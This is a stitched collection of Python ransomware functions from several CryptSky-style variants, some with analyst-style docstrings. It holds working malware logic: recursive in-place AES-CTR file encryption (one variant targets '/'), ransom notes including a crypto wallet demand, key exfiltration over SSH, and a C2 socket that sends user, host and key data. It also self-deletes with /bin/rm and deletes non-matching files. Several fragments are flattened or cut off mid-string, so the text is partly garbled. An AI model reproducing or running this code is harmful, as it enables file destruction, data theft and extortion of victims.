def main():
    """Entry point of this encrypt/decrypt PoC (CryptSky-style, in-place CTR).

    With ``--decrypt <hexkey>`` the hex string is decoded into the AES key,
    ``pre_decrypt()`` is run, and every file ``discover.discoverFiles`` yields
    under ``startdirs`` is passed through ``crypt.decrypt`` in place.  Without
    it a fresh 16-byte key is drawn from ``Random.get_random_bytes``, the same
    files are encrypted in place, ``post_encrypt()`` runs, the key is handed to
    ``remote.connect`` (the original comment says "over SSH"), a path derived
    from this script's own location is removed with ``/bin/rm``, and ``popup()``
    is called.

    Analyst notes, all grounded in the lines below:
      * The raw key is printed to stdout in BOTH modes (the ``TODO`` prints), so
        any captured terminal / job log recovers it.
      * ``Counter.new(128)`` is created without a nonce or initial value and one
        cipher object serves every file, so the keystream depends on the key
        alone: two runs with the same key reuse the same keystream, and decrypt
        must visit the files in the same order encrypt did.
      * ``startdirs``, ``HOSTNAME``, ``USERNAME``, ``PASSWORD``, ``remote``,
        ``discover``, ``modify``, ``popup`` and ``sp`` are module-level names
        defined outside this block.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']
    # Decrypt mode: the --decrypt value is the hex-encoded AES key.
    if decrypt:
        # Key comes from the command-line argument, not stdin.
        key = binascii.unhexlify(decrypt)
        # TODO: Remove print -- leaks the key to stdout.
        print(binascii.hexlify(key))
        # No initial_value: counter always starts at the library default,
        # so the keystream is identical for every run with the same key.
        ctr = Counter.new(128)
        crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
        # Restores the '.encrypted' copies and deletes everything else
        # (see pre_decrypt) before the in-place decryption pass.
        pre_decrypt()
        for currentDir in startdirs:
            # Second argument to discoverFiles is 0 here and 1 in
            # pre_decrypt; its meaning is not visible in this file.
            for file in discover.discoverFiles(currentDir, 0):
                modify.modify_file_inplace(file, crypt.decrypt)
    # Encrypt mode
    else:
        # Generate random 128-bit key (16 bytes -> AES-128).
        key = Random.get_random_bytes(16)
        # TODO: Remove print -- leaks the key to stdout.
        print(binascii.hexlify(key))
        ctr = Counter.new(128)
        crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir, 0):
                modify.modify_file_inplace(file, crypt.encrypt)
        # Copies each (already encrypted) file to '<name>.encrypted' and
        # overwrites the original (see post_encrypt).
        post_encrypt()
        # Send key to the remote host. NOTE(review): hexlify() returns bytes;
        # on Python 3, str() of that is the repr "b'...'" (with the b prefix and
        # quotes), not the bare hex digits the original comment implies.
        remote.connect(HOSTNAME, USERNAME, PASSWORD, str(binascii.hexlify(key)))
        # Self destroy: removes the absolute path minus its last 12 characters.
        # What that resolves to depends on this script's filename -- cannot be
        # determined from here; the commented alternative strips only ".py".
        self_path = os.path.abspath(__file__)
        sp.call(["/bin/rm", self_path[:-12]])
        #sp.call(["/bin/rm", self_path[:-3]])
        # Popup Message
        popup()
def main():
    """Apply an AES-CTR keystream in place to every file under ``startdirs``.

    ``--decrypt`` selects the fixed key ``'saveusfrompsgpls'``; otherwise the
    key is ``HARDCODED_KEY``.  Both paths call ``crypt.encrypt``: in CTR mode
    encryption and decryption are the same XOR with the keystream, so the
    "decrypt" run only restores files if ``HARDCODED_KEY`` equals the
    decrypt-mode string and the files are visited in the same order.

    Notes:
      * If ``HARDCODED_KEY`` is falsy in encrypt mode, ``key`` is never bound
        and ``AES.new`` raises ``NameError``.
      * The trailing ``for _ in range(100)`` loop executes only ``pass``; the
        key is not wiped.
      * ``get_parser``, ``HARDCODED_KEY``, ``discover`` and ``modify`` are
        module-level names defined outside this block.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']
    if decrypt:
        # 16 characters -> AES-128 key material.
        key = 'saveusfrompsgpls'
    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY
    # No nonce / initial_value: keystream is identical on every run with the same key.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    startdirs = ['/Users/mercifulrookie/Desktop/syssec']  #PUT YOURS PRAVIN, I USED /NARAYANAA
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            # Same call in both modes (CTR is symmetric).
            modify.modify_file_inplace(file, crypt.encrypt)
    # Placeholder loop: the body is a comment plus `pass`, nothing is overwritten.
    for _ in range(100):
        #key = random(32)
        pass
    if not decrypt:
        pass
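def decrypt(key):
    """Decrypt every ``.Cryptsky`` file under ``START_DIR`` with ``key``, reporting in the GUI.

    Args:
        key: The candidate key string; it is validated with ``check_key`` and
            encoded to bytes for ``AES.new``.

    Returns:
        ``False`` when ``check_key(key)`` rejects the key; ``None`` otherwise
        (the function reports progress through ``tkinter.Label`` widgets on the
        module-level ``root`` window rather than a return value).

    Notes:
      * CTR mode is symmetric, so ``crypt.encrypt`` is what undoes the
        encryption.  ``Counter.new(128)`` has no nonce, and a single cipher
        object is used for all files, so the files must be visited in the same
        order as during encryption for the keystream to line up.
      * ``check_key``, ``root``, ``START_DIR``, ``discover`` and ``modify`` are
        module-level names defined outside this block.
    """
    if check_key(key):
        l = tkinter.Label(
            root,
            text="This is the correct key. \n"
            "Your files are being decrypted but it may take a while. Please wait..."
        )
        l.pack()
        ctr = Counter.new(128)
        crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)
        startdirs = START_DIR
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir):
                (name, ext) = os.path.splitext(file)
                # Exact match.  The original `ext in '.Cryptsky'` was a substring
                # test: '' (files with no extension), '.C', '.Cry', ... all passed,
                # so the keystream was applied to files that were never encrypted,
                # corrupting them, and they were "renamed" to their own name.
                if ext == '.Cryptsky':
                    try:
                        modify.modify_file_inplace(file, crypt.encrypt)
                        os.rename(file, name)
                    except IOError:
                        print("Error")
        try:
            print()
            # Removes a log file presumably written by the encryption side;
            # not visible from here.  Missing file is not an error.
            os.remove(r'C:\Windows\Temp\winUpdater.log')
        except FileNotFoundError:
            pass
        label = tkinter.Label(
            root,
            text="Congratulations. Your files are now decrypted")
        label.pack()
    else:
        return False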
def main():
    """Python 2 entry point: encrypt (or re-apply the keystream to) files under ``startdirs``.

    With ``--decrypt`` a banner is printed and the key is read from the
    terminal with ``raw_input``; otherwise ``generate_key()`` (not shown)
    supplies it.  Both modes call ``crypt.encrypt`` -- CTR mode is symmetric --
    and both print "Your System has been Decrypted!!" afterwards, so the
    message does not mean decryption happened.

    Notes:
      * The ``key = randint(...)`` loop only rebinds the name; Python strings
        are immutable, the previous key object is unchanged until garbage
        collected, and ``crypt`` still holds the key schedule.  Nothing is wiped.
      * ``get_parser``, ``generate_key``, ``discover``, ``modify`` and
        ``randint`` are module-level names defined outside this block.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']
    if decrypt:
        print '''
Ransomware!
---------------
Your files have been encrypted.
'''
        # Key typed by the user; no validation before it is handed to AES.new.
        key = raw_input('Enter Your Key> ')
    else:
        key = generate_key()
    # No nonce / initial_value: keystream is identical on every run with the same key,
    # and the one cipher object's counter carries over from file to file.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    startdirs = ['/media/bin4rygh0st/UBUNTU 19_1/']
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
    # Printed unconditionally, in encrypt mode too.
    print("Your System has been Decrypted!!")
    # Rebinding `key` 100 times does not overwrite the old key bytes (see docstring).
    for _ in range(100):
        key = randint(0, 999999999999)
        pass
    if not decrypt:
        pass
def pre_decrypt():
    """Prepare the tree under ``startdirs`` for an in-place decryption pass.

    Every path yielded by ``discover.discoverFiles(dir, 1)`` whose last
    dot-separated segment is ``encrypted`` is renamed by dropping the
    ``.encrypted`` suffix (10 characters).  Every other path is deleted --
    on a tree that was not produced by ``post_encrypt`` this is plain data
    destruction, so only run it against the expected layout.

    ``startdirs`` and ``discover`` are module-level names defined outside this
    block.
    """
    suffix = '.encrypted'
    marker = suffix[1:]
    for current_dir in startdirs:
        for path in discover.discoverFiles(current_dir, 1):
            # rpartition('.')[2] is the whole path when there is no dot,
            # exactly like split('.')[-1].
            if path.rpartition('.')[2] == marker:
                os.rename(path, path[:-len(suffix)])
            else:
                os.remove(path)
def main(): parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: print ''' AnkurCryWare! --------------- Your files have been encrypted. This is normally the part where I would tell you to pay a ransom, and I will send you the decryption key. However, this is an open source project to show how easy malware can be to write and to allow others to view what may be one of the first fully open source python ransomwares. This project does not aim to be malicious. The decryption key can be found below, free of charge. Please be sure to type it in EXACTLY, or you risk losing your files forever. Do not include the surrounding quotes, but do make sure to match case, special characters, and anything else EXACTLY! Happy decrypting and be more careful next time! Your decryption key is: '{}' '''.format(HARDCODED_KEY) key = raw_input('Enter Your Key> ') else: # In real ransomware, this part includes complicated key generation, # sending the key back to attackers and more # maybe I'll do that later. but for now, this will do. if HARDCODED_KEY: key = HARDCODED_KEY else: key = random(32) ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) # change this to fit your needs. startdirs = ['/'] for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) os.rename(file, file+'.AnkurCryWare') # append filename to indicate crypted # This wipes the key out of memory # to avoid recovery by third party tools for _ in range(100): key = random(32) pass if not decrypt: pass # post encrypt stuff # desktop picture # icon, etc print "Your device is encrypted by AnkurCryWare
def main():
    """Encrypt the ``START_DIR`` tree once and leave an evidence file at ``PATH``.

    If ``PATH`` already exists the run is treated as a repeat: a message is
    printed, the ``WindowThread`` GUI is started, and after ten seconds a
    "safe to stop" label is shown.  Otherwise every file found under
    ``START_DIR`` is encrypted in place with AES-CTR under ``HARDCODED_KEY``
    and renamed with a ``.Cryptsky`` suffix, then a text file naming the key
    ("yellow submarine", 16 bytes = AES-128) is written to ``PATH``.

    Notes:
      * The evidence file literally contains the key, so any responder with
        the file can build the decryptor.
      * ``PATH``, ``START_DIR``, ``HARDCODED_KEY``, ``WindowThread``, ``root``,
        ``discover`` and ``modify`` are module-level names defined outside
        this block.
    """
    if PATH.is_file():
        print("Already Encrypted :)")
        window_thread = WindowThread()
        window_thread.start()
        time.sleep(10)
        safe = tkinter.Label(
            root,
            text="It is now safe to stop execution of this program. "
            "Hopefully you found the key ;)")
        safe.pack()
    else:
        # HARDCODED_KEY is a str here (it is .encode()d below).
        key = HARDCODED_KEY
        # No nonce / initial_value; one cipher object for all files, so the
        # keystream position carries over between files.
        ctr = Counter.new(128)
        crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)
        # change this to fit needs.
        startdirs = START_DIR
        # starts window so it appears while files are still being encrypted
        window_thread = WindowThread()
        window_thread.start()
        # encrypt files
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir):
                try:
                    modify.modify_file_inplace(file, crypt.encrypt)
                    os.rename(
                        file,
                        file + '.Cryptsky')  # append filename to indicate crypted
                except IOError:
                    # Best effort: a failing file is reported and skipped.
                    print("Error")
        # write evidence file to disk (shadows the builtin `file`; not a `with`
        # block, so an exception in write() would leak the handle)
        file = open(PATH, 'w+')
        file.write("JBOOZ encrypted this with a custom version of CryptSky. "
                   "The key for this version is: yellow submarine"
                   )  # you're welcome blue team ;)
        file.close()
        safe = tkinter.Label(
            root,
            text="It is now safe to stop execution of this program. "
            "Hopefully you found the key ;)")
        safe.pack()
''' # Taken out for Case Studies
def main():
    """Python 2 entry point: apply an AES-CTR keystream to every file under ``/home``.

    With ``--decrypt`` a ransom banner is printed and the key is read from the
    terminal; otherwise ``HARDCODED_KEY`` is used.  Both modes call
    ``crypt.encrypt`` (CTR mode is symmetric), and the ``os.rename`` that
    would mark encrypted files is commented out, so nothing on disk records
    which files have already been processed.

    Notes:
      * The banner's ``.format(HARDCODED_KEY)`` has no ``{}`` placeholder, so
        the key is never shown and the argument is discarded.
      * If ``HARDCODED_KEY`` is falsy in encrypt mode, ``key`` is never bound
        and ``AES.new`` raises ``NameError`` (the random fallback is commented
        out).
      * ``get_parser``, ``HARDCODED_KEY``, ``discover`` and ``modify`` are
        module-level names defined outside this block.
    """
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']
    if decrypt:
        print '''
*ULTRA YEET*
---------------
Your files have been encrypted.
Pay a ransom of .5 ETH to 0x8dfaC9f5E011CD1Ce1d5b7537a1c6E9703902aCA
If you do not pay this ransom you're files will be lost >:3
Your decryption key will bee given to you once proof of payment is received
'''.format(HARDCODED_KEY)
        # Key typed by the user; no validation before it is handed to AES.new.
        key = raw_input('Enter Your Key> ')
    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY
        # else:
        #     key = random(32)
    # No nonce / initial_value: keystream is identical on every run with the same key.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    # change this to do what you want
    startdirs = ['/home']
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
            #os.rename(file, file+'.Cryptsky') # append filename to indicate crypted
    # NOTE: despite the original "wipes the key out of memory" comment, the
    # loop body is a comment plus `pass`; nothing is overwritten.
    for _ in range(100):
        #key = random(32)
        pass
    if not decrypt:
        pass
def main():
    """Entry point (``main_v2.py``): encrypt or decrypt a directory tree and, when encrypting, contact a C2.

    Target selection: ``--path`` if given, else ``~/test_ransomware`` (Linux /
    macOS) or ``%USERPROFILE%\\test_ransomware`` (Windows).  The AES key is the
    module-level ``HARDCODED_KEY`` in both modes: the "decrypt" branch merely
    RSA-unwraps the value this same run wrapped a few lines earlier, so no
    external input is ever needed to decrypt.

    Analyst notes, all visible below:
      * Both the RSA public key and the RSA *private* key are module-level
        constants available to this script (the comment says "hardcoded for
        testing"), so anyone holding the sample can recover the AES key.
      * The socket message sent by ``connector`` contains the private key,
        the public key, local IP, OS, user and hostname -- but NOT the wrapped
        AES key, despite the "Exfiltrate encrypted key" comment; that value is
        only printed to stdout and passed to ``mainwindow``.
      * ``Counter.new(128)`` has no nonce and one cipher object serves all
        files, so decryption must visit files in the same order as encryption.
      * ``parse_args``, ``extension``, ``host``, ``port``, ``getlocalip``,
        ``mainwindow``, ``SERVER_*_RSA_KEY``, ``HARDCODED_KEY``, ``discover``
        and ``modify`` are defined outside this block.
    """
    if len(sys.argv) <= 1:
        print('[*] Ransomware - PoC\n')
        # banner()
        print('Usage: python3 main_v2.py -h')
        print('{} -h for help.'.format(sys.argv[0]))
        exit(0)
    # Parse arguments
    args = parse_args()
    encrypt = args.encrypt
    decrypt = args.decrypt
    # str(None) == 'None' is the "no --path given" sentinel used below.
    absolute_path = str(args.path)
    # Force one click and comment out args above
    # absolute_path = "None"
    # encrypt = True
    # decrypt = False
    if absolute_path != 'None':
        startdirs = [absolute_path]
    else:
        # Check OS
        plt = platform.system()
        if plt == "Linux" or plt == "Darwin":
            startdirs = [os.environ['HOME'] + '/test_ransomware']
        elif plt == "Windows":
            startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
            # Can also hardcode additional directories
            # startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
            #              os.environ['USERPROFILE'] + '\\Documents',
            #              os.environ['USERPROFILE'] + '\\Music',
            #              os.environ['USERPROFILE'] + '\\Desktop',
            #              os.environ['USERPROFILE'] + '\\Onedrive']
        else:
            print("Unidentified system")
            exit(0)
    # Wrap the (hard-coded) AES key with the embedded RSA public key (OAEP).
    # This happens on every run, including decrypt-only runs.
    server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
    encryptor = PKCS1_OAEP.new(server_key)
    encrypted_key = encryptor.encrypt(HARDCODED_KEY)
    encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
    # Wrapped key goes to stdout.
    print("Encrypted key " + encrypted_key_b64 + "\n")
    if encrypt:
        key = HARDCODED_KEY
    if decrypt:
        # RSA Decryption - the private key is hardcoded (testing). Unwraps the
        # value computed above, so `key` ends up equal to HARDCODED_KEY.
        rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
        decryptor = PKCS1_OAEP.new(rsa_key)
        key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
    # Create AES counter and AES cipher. If neither flag is set, `key` is
    # unbound here and AES.new raises NameError.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    # Recursively go through folders and encrypt/decrypt files
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            if encrypt and not file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                os.rename(file, file + extension)
                print("File changed from " + file + " to " + file + extension)
            if decrypt and file.endswith(extension):
                # CTR is symmetric: encrypt() undoes the encryption.
                modify.modify_file_inplace(file, crypt.encrypt)
                file_original = os.path.splitext(file)[0]
                os.rename(file, file_original)
                print("File changed from " + file + " to " + file_original)
    if encrypt:
        # Contact the C2 after encryption has finished.
        def connector():
            """Send a host-info record to (host, port), then show the GUI either way."""
            server = socket.socket(socket.AF_INET)
            server.settimeout(10)
            try:
                # '$'-separated record: local IP, OS, RSA private key, RSA
                # public key, username, hostname. The wrapped AES key is not
                # part of it.
                server.connect((host, port))
                msg = '%s$%s$%s$%s$%s$%s' % (
                    getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY,
                    SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node())
                server.send(msg.encode('utf-8'))
                # if plt == "Windows"
                main = mainwindow(encrypted_key_b64)
                main.mainloop()
            except Exception as e:
                # if plt == "Windows"
                # Any failure (no C2 reachable, timeout) is swallowed; the
                # window is shown regardless.
                main = mainwindow(encrypted_key_b64)
                main.mainloop()
                pass
        try:
            connector()
        except KeyboardInterrupt:
            sys.exit(0)
    # NOTE: despite the original "wipes the key out of memory" comment, the
    # loop body is a comment plus `pass`; nothing is overwritten.
    for _ in range(100):
        #key = random(32)
        pass
def main():
    """Entry point (``main.py``): encrypt or decrypt a directory tree in place with AES-CTR.

    Target selection: ``--path`` if given, else ``~/test_ransomware`` (Linux /
    macOS) or ``%USERPROFILE%\\test_ransomware`` (Windows).  The AES key is the
    module-level ``HARDCODED_KEY`` in both modes: the "decrypt" branch only
    RSA-unwraps the value this same run wrapped a few lines earlier, so
    decryption needs nothing that is not already inside the script.

    Analyst notes, all visible below:
      * The ransom note prints ``SERVER_PUBLIC_RSA_KEY`` as "the key"; the
        matching private key is a module-level constant (the comment says
        "hardcoded for testing"), so the sample itself is the decryptor.
      * ``Counter.new(128)`` has no nonce and one cipher object serves all
        files, so decryption must visit files in the same order as encryption.
      * ``parse_args``, ``extension``, ``SERVER_*_RSA_KEY``, ``HARDCODED_KEY``,
        ``discover`` and ``modify`` are defined outside this block.
    """
    if len(sys.argv) <= 1:
        print('[*] Ransomware - PoC\n')
        # banner()
        print('Usage: python3 main.py -h')
        print('{} -h for help.'.format(sys.argv[0]))
        exit(0)
    # Parse arguments
    args = parse_args()
    encrypt = args.encrypt
    decrypt = args.decrypt
    # str(None) == 'None' is the "no --path given" sentinel used below.
    absolute_path = str(args.path)
    # Force one click and comment out args above
    # absolute_path = "None"
    # encrypt = True
    # decrypt = False
    if absolute_path != 'None':
        startdirs = [absolute_path]
    else:
        # Check OS
        plt = platform.system()
        if plt == "Linux" or plt == "Darwin":
            startdirs = [os.environ['HOME'] + '/test_ransomware']
        elif plt == "Windows":
            startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
            # Can also hardcode additional directories
            # startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
            #              os.environ['USERPROFILE'] + '\\Documents',
            #              os.environ['USERPROFILE'] + '\\Music',
            #              os.environ['USERPROFILE'] + '\\Desktop',
            #              os.environ['USERPROFILE'] + '\\Onedrive']
        else:
            print("Unidentified system")
            exit(0)
    # Wrap the (hard-coded) AES key with the embedded RSA public key (OAEP).
    # This happens on every run, including decrypt-only runs.
    server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
    encryptor = PKCS1_OAEP.new(server_key)
    encrypted_key = encryptor.encrypt(HARDCODED_KEY)
    encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
    # Wrapped key goes to stdout.
    print("Encrypted key " + encrypted_key_b64 + "\n")
    if encrypt:
        # Ransom note; the "key" it shows is the RSA public key.
        print("[COMPANY_NAME]\n\n"
              "YOUR NETWORK IS ENCRYPTED NOW\n\n"
              "USE - TO GET THE PRICE FOR YOUR DATA\n\n"
              "DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n"
              "DO NOT RENAME OR MOVE THE FILE\n\n"
              "THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n"
              "[begin_key]\n{}\n[end_key]\n"
              "KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY))
        key = HARDCODED_KEY
    if decrypt:
        # RSA Decryption - the private key is hardcoded (testing). Unwraps the
        # value computed above, so `key` ends up equal to HARDCODED_KEY.
        rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
        decryptor = PKCS1_OAEP.new(rsa_key)
        key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
    # Create AES counter and AES cipher. If neither flag is set, `key` is
    # unbound here and AES.new raises NameError.
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    # Recursively go through folders and encrypt/decrypt files
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            if encrypt and not file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                os.rename(file, file + extension)
                print("File changed from " + file + " to " + file + extension)
            if decrypt and file.endswith(extension):
                # CTR is symmetric: encrypt() undoes the encryption.
                modify.modify_file_inplace(file, crypt.encrypt)
                file_original = os.path.splitext(file)[0]
                os.rename(file, file_original)
                print("File changed from " + file + " to " + file_original)
    # NOTE: despite the original "wipes the key out of memory" comment, the
    # loop body is a comment plus `pass`; nothing is overwritten.
    for _ in range(100):
        #key = random(32)
        pass
return parser if __name__=="__main__": parser = get_parser() args = vars(parser.parse_args()) decrypt = args['decrypt'] if decrypt: key = 'saveusfrompsgpls' else: if HARDCODED_KEY: key = HARDCODED_KEY ctr = Counter.new(128) crypt = AES.new(key, AES.MODE_CTR, counter=ctr) startdirs = ['/Users/testDirectory/'] #PLEASE INSERT DIRECTORY ACCORDING TO YOUR NEED for currentDir in startdirs: for file in discover.discoverFiles(currentDir): modify.modify_file_inplace(file, crypt.encrypt) for _ in range(100): #key = random(32) pass if not decrypt: pass
def post_encrypt():
    """Duplicate every file under ``startdirs`` as ``<path>.encrypted`` and overwrite the original.

    For each path yielded by ``discover.discoverFiles(dir, 0)`` a metadata-
    preserving copy (``shutil.copy2``) is written next to it with the
    ``.encrypted`` suffix, then ``modify.overwrite_file_inplace`` is applied to
    the original path.  Nothing in this block inspects the file contents, so
    it runs over whatever state the earlier pass left on disk.

    ``startdirs``, ``discover`` and ``modify`` are module-level names defined
    outside this block.
    """
    suffix = '.encrypted'
    # Lazy: paths are produced directory by directory, in discovery order.
    targets = (path for folder in startdirs
               for path in discover.discoverFiles(folder, 0))
    for path in targets:
        shutil.copy2(path, path + suffix)
        modify.overwrite_file_inplace(path)